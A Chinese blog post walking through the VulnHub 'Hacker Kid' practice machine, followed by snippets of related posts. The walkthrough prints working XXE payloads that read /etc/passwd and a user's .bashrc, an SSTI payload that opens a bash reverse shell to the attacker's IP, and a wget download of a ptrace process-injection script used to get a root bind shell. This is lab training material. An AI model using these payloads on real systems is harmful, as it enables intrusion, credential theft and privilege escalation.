VulnHub日记(八):Hacker Kid

最新推荐文章于 2024-08-05 20:50:35 发布
最新推荐文章于 2024-08-05 20:50:35 发布
阅读量361 收藏 1
点赞数
分类专栏: VlunHub日记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/119422810
版权

靶机介绍

参考链接:Hacker Kid Walkthrough - Vulnhub - Security - NepCodeX

虚拟机链接:Hacker kid: 1.0.1 ~ VulnHub

开始练习

本机ip:192.168.56.102

nmap扫描目的机ip:192.168.56.108

nmap -sS 192.168.56.0/24

扫描目的机开放端口及服务

nmap -A -p- 192.168.56.108

开启了53 80 9999 端口,扫描80端口目录

 访问80端口,在代码中发现注释,删除注释标识后出现新的按钮

 

下方还有注释提示,打开bp使用intruder模块加入page_no参数

 

 成功得到有效参数值

http://192.168.56.121/?page_no=21

 写host文件,使用dig枚举子域名

dig hackers.blackhat.local @192.168.19.133

访问,查看网页代码,怀疑邮件处有XXE

 

 打开bp,修改数据包,测试payload

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY dd SYSTEM 'file:///etc/passwd'>]>
<root><name></name><tel></tel><email>
&dd;
</email><password></password></root>

 成功读取文件,使用php装包器打开sacket目录下.bashsrc文件,得到了编码后的用户名和密码

(大佬博客中写的是在之前web页面有过home的暗示,我自己是没有想到,这个靶场的暗示真是不少)

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY dd SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>
<root><name></name><tel></tel><email>
&dd;
</email><password></password></root>

 在9999端口的登陆页面登录失败,更换用户名sacket,登陆成功

(这里也是暗示),更改name参数的值,页面相应改变,因为nmap扫描的是Tornado,于是使用下面的SSTI payload反弹shell

参考:SSTI (Server Side Template Injection) - HackTricks

 

{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.56.102/4396 0>&1"')}}

转换为URL编码后将其赋值给name参数,打开监听端口,成功反弹shell

nc -nvlp 4396

 检查机器上不同二进制文件的功能

/sbin/getcap -r / 2>/dev/null

能利用这个信息提权

参考:  https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc
https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py

找到一个root权限进程,记住进程id

将inject代码保存到本地,本机打开http服务,使用wget获取本机inject.py文件

python -m SimpleHTTPServer

靶机中使用wget获取inject.py文件

wget 192.168.56.102:8000/inject.py

 

 利用参考中的inject.py文件,传入参数为选择的进程id,执行成功后会在靶机的5600端口开一个绑定shell

python2.7 inject.py 775

 

nc 192.168.56.121 5600

 

 获得rootshell

Vulnhub靶机:Hacker_Kid
qq_48904485的博客
02-25 1123
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:Hacker_Kid(10.0.2.42)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova。
Vulnhub靶场——Hacker_Kid-v1.0.1
Re1_zf的博客
10-10 1162
这里需要用到一个提权脚本,这个脚本的作用就是对root权限的进程注入python类型shellcode,利用python具备的cap_sys_ptrace+ep能力实现权限提升。此脚本如果执行成功,会在靶机本地监听5600端口,不过也可以修改脚本shellcode部分使其监听其他端口。搜索后发现,9999端口开放的一般是tornado服务,是一个python的web服务框架。前面访问的9999端口是一个登录页面,也许有用,拿去尝试登录一下。给name变量赋值会有回显,后端的变量应该就是name。
vulnhub靶场——Hacker-Kid-v1-0-1
Czheisenberg的博客
03-03 7467
vulnhub靶场——Hacker-Kid-v1-0-1 WP
vulnhubHacker_Kid-v1.0.1
qwweggfe的博客
08-23 961
kali:192.168.181.129 靶机:192.168.181.154 首先进行ip扫描
kali之vulnhub,hackerkid
weixin_54431413的博客
05-20 1136
此次打靶主要涉及到一些比较新型的漏洞,如DNS区域传输漏洞,XXE漏洞,模板注入,涉及了一种新型的提权方式,利用capabilities的cap_sys_ptrace来提权。
Vulnhub-Hacker kid: 1.0.1渗透
laoyanCZ的博客
12-12 1210
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
hackerrank:Hackerrank测试解决方案
04-27
在IT行业中,编程竞赛和在线评判平台如HackerRank扮演着重要的角色,它们为程序员提供了一个展示技能、学习新知识和提升算法理解的平台。"HackerRank测试解决方案"主要涉及的是利用Java语言来解决HackerRank上的各种...
Hackerrank:Hackerrank.com的简历
03-29
这个"Hackerrank-main"可能是用户在解决HackerRank挑战时创建的一个项目文件夹,包含了与HackerRank挑战相关的代码、解决方案和其他资源。通常,这样的文件夹会包含一个或多个C#源代码文件(如".cs"),用于实现特定...
hackerrank:HackerRank挑战
03-20
【黑客等级:HackerRank挑战】是编程爱好者和求职者提升技能、展示能力的一个平台,尤其在Python领域,HackerRank提供了丰富的练习题目和比赛,旨在帮助程序员掌握Python语言的各种特性,提高解决问题的能力。Hacker...
rankjs:Hackerrank 10天JavaScript解决方案
05-08
"RankJS: HackerRank 10天JavaScript解决方案"是一个针对HackerRank上JavaScript挑战的解答集合,旨在帮助用户解决这10天内的所有问题。 在这10天的挑战中,你将接触到JavaScript的基础到高级概念,包括但不限于: ...
python-inject:Python依赖注入
05-25
python注入 依赖注入是python的好方法。 不是Guice或Spring的港口。 主要特征 快速地。 线程安全的。 易于使用。 不窃取类的构造函数。 不要尝试管理您的应用程序对象图。 透明地集成到测试中。 支持Python 3.5+( v4.* )和Python 2.7–3.5( v3.* )。 在Python 3.5+中支持类型提示。 利用类型注释的自动参数。 Python支持 Python 注入版本 3.6+ 4.1+ 3.5 4.0 <3> = 3.5中支持此功能。 @ inject . autoparams () def ref
Hacker_kid-v1.0.1(vulnhub)
wcl20010的博客
05-07 1764
中等难度的靶机,取得权限即可(提示:信息收集,不需要爆破) 此靶机存在的都是新兴的漏洞类型。 地址如下: https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova 1.主机发现 arp-scan -l 2.端口发现 nmap -p 1-65535 -A 192.168.56.106 详细信息如下: 53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux) | dns-nsid:
Vulnhub靶机:HACKER KID_ 1.0.1
LainWith的博客
07-17 997
系列Hackerkid(此系列共1台)发布日期2021年08月02日**难度等级**低→中**打靶目标**取得root权限**提示信息**OSCP样式的靶机(专注于信息收集,不要爆破,每一步都有适当提示)https主机发现端口扫描WEB信息收集DNS区域传输XXE注入攻击PHP封装器SSTI模板注入Capabilitie提权httpshttpshttpshttpshttpshttpshttpshttpshttpshttps。...
打靶记录7——Hacker_Kid-v1.0.1
最新发布
Fab1an的博客
08-05 889
针对这台靶机首先进行了主机发现和端口扫描针对DNS服务进行上网搜索,发现两个CVE,但是没有POC于是通过Web入手,在源代码发现提示信息,找到一个参数,利用这个参数发现了页面里隐藏的关于域名的信息拿到这个域名之后,使用dig命令针对这个DNS区域进行区域传输,最后拿到整个域名下所有的主机记录(A记录,CNAME记录全都拿到)在本机对/etc/hosts文件进行修改,将这些域名绑定到目标靶机的IP地址上,通过这种方法发现了一个新的页面在这个新的页面当中,首先发现了XXE。
Hacker kid靶场渗透
m0_59518755的博客
07-26 1002
Hacker kid靶场渗透教程,特别详细,新手小白都能看懂
HACKER KID: 1.0.1实战演练
龙狼刺的博客
05-30 821
Hacker-Kid实战演练。
Hacker_kid靶机打靶过程及思路
qq_52610024的博客
04-25 1748
下载利用权限利用的python进程注入脚本wgethttps//gist.githubusercontent.com/wifisecguy/1d69839fe55c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py。7.挨个读取后,在读取/home/saket/.bashrc时没有回显,使用php封装器读取,然后进行解码。,发现得到用户名和密码,在登录处登录失效,尝试使用saket作为用户名登录。...
CAP_SYS_PTRACE的python脚本逃逸
Jack_chao_的博客
03-28 926
讲述一点逃逸
Hack_Kid
果粒程
11-16 205
Hack_Kid
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值